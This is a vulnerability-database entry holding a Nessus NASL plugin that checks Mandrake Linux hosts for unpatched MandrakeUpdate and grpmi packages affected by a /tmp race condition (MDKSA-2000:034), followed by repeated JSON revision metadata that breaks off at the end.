Mandrake Linux Security Advisory : MandrakeUpdate (MDKSA-2000:034)
2012-09-06T00:00:00
ID MANDRAKE_MDKSA-2000-034.NASL Type nessus Reporter Tenable Modified 2018-07-19T00:00:00
Description
There is a possible race condition in MandrakeUpdate that has the potential for users to tamper with RPMs downloaded by MandrakeUpdate prior to them being installed. This is due to files being stored in the /tmp directory. This is a very low security-risk as most servers that provide user logins shouldn't be using MandrakeUpdate. These updated versions provide a fix for the problem by using /root/tmp instead of /tmp.
#%NASL_MIN_LEVEL 70103
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Mandrake Linux Security Advisory MDKSA-2000:034.
# The text itself is copyright (C) Mandriva S.A.
#
include("compat.inc");
if (description)
{
script_id(61828);
script_version("1.4");
script_cvs_date("Date: 2018/07/19 20:59:12");
script_xref(name:"MDKSA", value:"2000:034");
script_name(english:"Mandrake Linux Security Advisory : MandrakeUpdate (MDKSA-2000:034)");
script_summary(english:"Checks rpm output for the updated packages");
script_set_attribute(
attribute:"synopsis",
value:
"The remote Mandrake Linux host is missing one or more security
updates."
);
script_set_attribute(
attribute:"description",
value:
"There is a possible race condition in MandrakeUpdate that has the
potential for users to tamper with RPMs downloaded by MandrakeUpdate
prior to them being installed. This is due to files being stored in
the /tmp directory. This is a very low security-risk as most servers
that provide user logins shouldn't be using MandrakeUpdate. These
updated versions provide a fix for the problem by using /root/tmp
instead of /tmp."
);
script_set_attribute(
attribute:"solution",
value:"Update the affected MandrakeUpdate and / or grpmi packages."
);
script_set_attribute(attribute:"risk_factor", value:"High");
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:MandrakeUpdate");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:grpmi");
script_set_attribute(attribute:"cpe", value:"cpe:/o:mandrakesoft:mandrake_linux:6.0");
script_set_attribute(attribute:"cpe", value:"cpe:/o:mandrakesoft:mandrake_linux:6.1");
script_set_attribute(attribute:"cpe", value:"cpe:/o:mandrakesoft:mandrake_linux:7.0");
script_set_attribute(attribute:"cpe", value:"cpe:/o:mandrakesoft:mandrake_linux:7.1");
script_set_attribute(attribute:"patch_publication_date", value:"2000/08/12");
script_set_attribute(attribute:"plugin_publication_date", value:"2012/09/06");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.");
script_family(english:"Mandriva Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/Mandrake/release", "Host/Mandrake/rpm-list");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/Mandrake/release")) audit(AUDIT_OS_NOT, "Mandriva / Mandake Linux");
if (!get_kb_item("Host/Mandrake/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if (cpu !~ "^(amd64|i[3-6]86|x86_64)$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Mandriva / Mandrake Linux", cpu);
flag = 0;
if (rpm_check(release:"MDK6.0", cpu:"i386", reference:"MandrakeUpdate-6.0-6mdk", yank:"mdk")) flag++;
if (rpm_check(release:"MDK6.0", cpu:"i386", reference:"grpmi-0.9-6mdk", yank:"mdk")) flag++;
if (rpm_check(release:"MDK6.1", cpu:"i386", reference:"MandrakeUpdate-6.1-4mdk", yank:"mdk")) flag++;
if (rpm_check(release:"MDK6.1", cpu:"i386", reference:"grpmi-0.9-4mdk", yank:"mdk")) flag++;
if (rpm_check(release:"MDK7.0", cpu:"i386", reference:"MandrakeUpdate-7.0-13mdk", yank:"mdk")) flag++;
if (rpm_check(release:"MDK7.0", cpu:"i386", reference:"grpmi-0.9-13mdk", yank:"mdk")) flag++;
if (rpm_check(release:"MDK7.1", cpu:"i386", reference:"MandrakeUpdate-7.1-9mdk", yank:"mdk")) flag++;
if (rpm_check(release:"MDK7.1", cpu:"i386", reference:"grpmi-7.1-9mdk", yank:"mdk")) flag++;
if (flag)
{
if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
else security_hole(0);
exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");
{"id": "MANDRAKE_MDKSA-2000-034.NASL", "bulletinFamily": "scanner", "title": "Mandrake Linux Security Advisory : MandrakeUpdate (MDKSA-2000:034)", "description": "There is a possible race condition in MandrakeUpdate that has the potential for users to tamper with RPMs downloaded by MandrakeUpdate prior to them being installed. This is due to files being stored in the /tmp directory. This is a very low security-risk as most servers that provide user logins shouldn't be using MandrakeUpdate. These updated versions provide a fix for the problem by using /root/tmp instead of /tmp.", "published": "2012-09-06T00:00:00", "modified": "2018-07-19T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=61828", "reporter": "Tenable", "references": [], "cvelist": [], "type": "nessus", "lastseen": "2019-02-21T01:17:32", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:mandrakesoft:mandrake_linux:7.0", "cpe:/o:mandrakesoft:mandrake_linux:7.1", "cpe:/o:mandrakesoft:mandrake_linux:6.1", "p-cpe:/a:mandriva:linux:MandrakeUpdate", "cpe:/o:mandrakesoft:mandrake_linux:6.0", "p-cpe:/a:mandriva:linux:grpmi"], "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "There is a possible race condition in MandrakeUpdate that has the potential for users to tamper with RPMs downloaded by MandrakeUpdate prior to them being installed. This is due to files being stored in the /tmp directory. This is a very low security-risk as most servers that provide user logins shouldn't be using MandrakeUpdate. These updated versions provide a fix for the problem by using /root/tmp instead of /tmp.", "edition": 2, "enchantments": {"score": {"value": 2.1, "vector": "NONE"}}, "hash": "780e79228b3471ace90893070d0da3ea1902514a3df4f9eaf6467c9942570b81", "hashmap": [{"hash": "baf82c5f44057670e481ac0239f388d8", "key": "title"}, {"hash": "24f79e561bde90df835a139b7f2e2693", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "aac8b5f7a52e4c207528727e825ec5b2", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "c6d334c1c792fc09e1a754323881b357", "key": "sourceData"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "cb0c2cf132b1e7768df2e3a97b4493b9", "key": "pluginID"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "d092fc79a86d3ffcb33cdd743fe9ebdf", "key": "href"}, {"hash": "526837706681051344a466f9e51ac982", "key": "naslFamily"}, {"hash": "bf9bf6f34c49bce5a42e75252db7a3a5", "key": "cpe"}, {"hash": "faa21f0434a57dda4b5fe410e015b02a", "key": "description"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=61828", "id": "MANDRAKE_MDKSA-2000-034.NASL", "lastseen": "2017-10-29T13:37:32", "modified": "2013-05-31T00:00:00", "naslFamily": "Mandriva Local Security Checks", "objectVersion": "1.3", "pluginID": "61828", "published": "2012-09-06T00:00:00", "references": [], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2000:034. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(61828);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2013/05/31 23:43:24 $\");\n\n script_xref(name:\"MDKSA\", value:\"2000:034\");\n\n script_name(english:\"Mandrake Linux Security Advisory : MandrakeUpdate (MDKSA-2000:034)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"There is a possible race condition in MandrakeUpdate that has the\npotential for users to tamper with RPMs downloaded by MandrakeUpdate\nprior to them being installed. This is due to files being stored in\nthe /tmp directory. This is a very low security-risk as most servers\nthat provide user logins shouldn't be using MandrakeUpdate. These\nupdated versions provide a fix for the problem by using /root/tmp\ninstead of /tmp.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected MandrakeUpdate and / or grpmi packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:MandrakeUpdate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:grpmi\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:6.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:6.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:7.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:7.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2000/08/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2013 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK6.0\", cpu:\"i386\", reference:\"MandrakeUpdate-6.0-6mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK6.0\", cpu:\"i386\", reference:\"grpmi-0.9-6mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK6.1\", cpu:\"i386\", reference:\"MandrakeUpdate-6.1-4mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK6.1\", cpu:\"i386\", reference:\"grpmi-0.9-4mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK7.0\", cpu:\"i386\", reference:\"MandrakeUpdate-7.0-13mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.0\", cpu:\"i386\", reference:\"grpmi-0.9-13mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK7.1\", cpu:\"i386\", reference:\"MandrakeUpdate-7.1-9mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.1\", cpu:\"i386\", reference:\"grpmi-7.1-9mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "Mandrake Linux Security Advisory : MandrakeUpdate (MDKSA-2000:034)", "type": "nessus", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 2, "lastseen": "2017-10-29T13:37:32"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:mandrakesoft:mandrake_linux:7.0", "cpe:/o:mandrakesoft:mandrake_linux:7.1", "cpe:/o:mandrakesoft:mandrake_linux:6.1", "p-cpe:/a:mandriva:linux:MandrakeUpdate", "cpe:/o:mandrakesoft:mandrake_linux:6.0", "p-cpe:/a:mandriva:linux:grpmi"], "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "There is a possible race condition in MandrakeUpdate that has the\npotential for users to tamper with RPMs downloaded by MandrakeUpdate\nprior to them being installed. This is due to files being stored in\nthe /tmp directory. This is a very low security-risk as most servers\nthat provide user logins shouldn't be using MandrakeUpdate. These\nupdated versions provide a fix for the problem by using /root/tmp\ninstead of /tmp.", "edition": 4, "enchantments": {"dependencies": {"modified": "2019-01-16T20:14:39", "references": [{"idList": ["ELSA-2006-0262"], "type": "oraclelinux"}]}, "score": {"value": 2.1, "vector": "NONE"}}, "hash": "6e712d42319aa47c668bfce9e9e24a18e400e91695e77ed1b974b9e206a0c1a5", "hashmap": [{"hash": "baf82c5f44057670e481ac0239f388d8", "key": "title"}, {"hash": "e2914120514a29eeccc01e381df164d8", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "aac8b5f7a52e4c207528727e825ec5b2", "key": "published"}, {"hash": "63960eb2660ba1cd051f26220562f030", "key": "sourceData"}, {"hash": "5bfbec7d1a393f7f59162872d1de7ac4", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "cb0c2cf132b1e7768df2e3a97b4493b9", "key": "pluginID"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "d092fc79a86d3ffcb33cdd743fe9ebdf", "key": "href"}, {"hash": "526837706681051344a466f9e51ac982", "key": "naslFamily"}, {"hash": "bf9bf6f34c49bce5a42e75252db7a3a5", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=61828", "id": "MANDRAKE_MDKSA-2000-034.NASL", "lastseen": "2019-01-16T20:14:39", "modified": "2018-07-19T00:00:00", "naslFamily": "Mandriva Local Security Checks", "objectVersion": "1.3", "pluginID": "61828", "published": "2012-09-06T00:00:00", "references": [], "reporter": "Tenable", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2000:034. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(61828);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/07/19 20:59:12\");\n\n script_xref(name:\"MDKSA\", value:\"2000:034\");\n\n script_name(english:\"Mandrake Linux Security Advisory : MandrakeUpdate (MDKSA-2000:034)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"There is a possible race condition in MandrakeUpdate that has the\npotential for users to tamper with RPMs downloaded by MandrakeUpdate\nprior to them being installed. This is due to files being stored in\nthe /tmp directory. This is a very low security-risk as most servers\nthat provide user logins shouldn't be using MandrakeUpdate. These\nupdated versions provide a fix for the problem by using /root/tmp\ninstead of /tmp.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected MandrakeUpdate and / or grpmi packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:MandrakeUpdate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:grpmi\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:6.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:6.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:7.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:7.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2000/08/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK6.0\", cpu:\"i386\", reference:\"MandrakeUpdate-6.0-6mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK6.0\", cpu:\"i386\", reference:\"grpmi-0.9-6mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK6.1\", cpu:\"i386\", reference:\"MandrakeUpdate-6.1-4mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK6.1\", cpu:\"i386\", reference:\"grpmi-0.9-4mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK7.0\", cpu:\"i386\", reference:\"MandrakeUpdate-7.0-13mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.0\", cpu:\"i386\", reference:\"grpmi-0.9-13mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK7.1\", cpu:\"i386\", reference:\"MandrakeUpdate-7.1-9mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.1\", cpu:\"i386\", reference:\"grpmi-7.1-9mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "Mandrake Linux Security Advisory : MandrakeUpdate (MDKSA-2000:034)", "type": "nessus", "viewCount": 0}, "differentElements": ["description"], "edition": 4, "lastseen": "2019-01-16T20:14:39"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "There is a possible race condition in MandrakeUpdate that has the potential for users to tamper with RPMs downloaded by MandrakeUpdate prior to them being installed. This is due to files being stored in the /tmp directory. This is a very low security-risk as most servers that provide user logins shouldn't be using MandrakeUpdate. These updated versions provide a fix for the problem by using /root/tmp instead of /tmp.", "edition": 1, "enchantments": {}, "hash": "d44441cb786ce6bc376ed13b7d82a0a8acf18ba84b497094dbc4765c1d6aa210", "hashmap": [{"hash": "baf82c5f44057670e481ac0239f388d8", "key": "title"}, {"hash": "24f79e561bde90df835a139b7f2e2693", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "aac8b5f7a52e4c207528727e825ec5b2", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "c6d334c1c792fc09e1a754323881b357", "key": "sourceData"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "cb0c2cf132b1e7768df2e3a97b4493b9", "key": "pluginID"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "d092fc79a86d3ffcb33cdd743fe9ebdf", "key": "href"}, {"hash": "526837706681051344a466f9e51ac982", "key": "naslFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "faa21f0434a57dda4b5fe410e015b02a", "key": "description"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=61828", "id": "MANDRAKE_MDKSA-2000-034.NASL", "lastseen": "2016-09-26T17:24:25", "modified": "2013-05-31T00:00:00", "naslFamily": "Mandriva Local Security Checks", "objectVersion": "1.2", "pluginID": "61828", "published": "2012-09-06T00:00:00", "references": [], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2000:034. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(61828);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2013/05/31 23:43:24 $\");\n\n script_xref(name:\"MDKSA\", value:\"2000:034\");\n\n script_name(english:\"Mandrake Linux Security Advisory : MandrakeUpdate (MDKSA-2000:034)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"There is a possible race condition in MandrakeUpdate that has the\npotential for users to tamper with RPMs downloaded by MandrakeUpdate\nprior to them being installed. This is due to files being stored in\nthe /tmp directory. This is a very low security-risk as most servers\nthat provide user logins shouldn't be using MandrakeUpdate. These\nupdated versions provide a fix for the problem by using /root/tmp\ninstead of /tmp.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected MandrakeUpdate and / or grpmi packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:MandrakeUpdate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:grpmi\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:6.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:6.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:7.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:7.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2000/08/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2013 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK6.0\", cpu:\"i386\", reference:\"MandrakeUpdate-6.0-6mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK6.0\", cpu:\"i386\", reference:\"grpmi-0.9-6mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK6.1\", cpu:\"i386\", reference:\"MandrakeUpdate-6.1-4mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK6.1\", cpu:\"i386\", reference:\"grpmi-0.9-4mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK7.0\", cpu:\"i386\", reference:\"MandrakeUpdate-7.0-13mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.0\", cpu:\"i386\", reference:\"grpmi-0.9-13mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK7.1\", cpu:\"i386\", reference:\"MandrakeUpdate-7.1-9mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK7.1\", cpu:\"i386\", reference:\"grpmi-7.1-9mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "Mandrake Linux Security Advisory : MandrakeUpdate (MDKSA-2000:034)", "type": "nessus", "viewCount": 0}, "differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:24:25"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:mandrakesoft:mandrake_linux:7.0", "cpe:/o:mandrakesoft:mandrake_linux:7.1", "cpe:/o:mandrakesoft:mandrake_linux:6.1", "p-cpe:/a:mandriva:linux:MandrakeUpdate", "cpe:/o:mandrakesoft:mandrake_linux:6.0", "p-cpe:/a:mandriva:linux:grpmi"], "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "There is a possible race condition in MandrakeUpdate that has the potential for users to tamper with RPMs downloaded by MandrakeUpdate prior to them being installed. This is due to files being stored in the /tmp directory. This is a very low security-risk as most servers that provide user logins shouldn't be using MandrakeUpdate. These updated versions provide a fix for the problem by using /root/tmp instead of /tmp.", "edition": 3, "enchantments": {"score": {"value": 2.1, "vector": "NONE"}}, "hash": "04f9bb52d6a1c43438e59bfe6b0f7a6cd55603601f688a13125a7cc4aac65c9e", "hashmap": [{"hash": "baf82c5f44057670e481ac0239f388d8", "key": "title"}, {"hash": "e2914120514a29eeccc01e381df164d8", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "aac8b5f7a52e4c207528727e825ec5b2", "key": "published"}, {"hash": "63960eb2660ba1cd051f26220562f030", "key": "sourceData"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "cb0c2cf132b1e7768df2e3a97b4493b9", "key": "pluginID"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "d092fc79a86d3ffcb33cdd743fe9ebdf", "key": "href"}, {"hash": "526837706681051344a466f9e51ac982", "key": "naslFamily"}, {"hash": "bf9bf6f34c49bce5a42e75252db7a3a5", "key": "cpe"}, {"hash": "faa21f0434a57dda4b5fe410e015b02a", "key": "description"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=61828", "id": "MANDRAKE_MDKSA-2000-034.NASL", "lastseen": "2018-08-02T07:50:41", "modified": "2018-07-19T00:00:00", "naslFamily": "Mandriva Local Security Checks", "objectVersion": "1.3", "pluginID": "61828", "published": "2012-09-06T00:00:00", "references": [], "reporter": "Tenable", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2000:034. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(61828);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/07/19 20:59:12\");\n\n script_xref(name:\"MDKSA\", value:\"2000:034\");\n\n script_name(english:\"Mandrake Linux Security Advisory : MandrakeUpdate (MDKSA-2000:034)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n 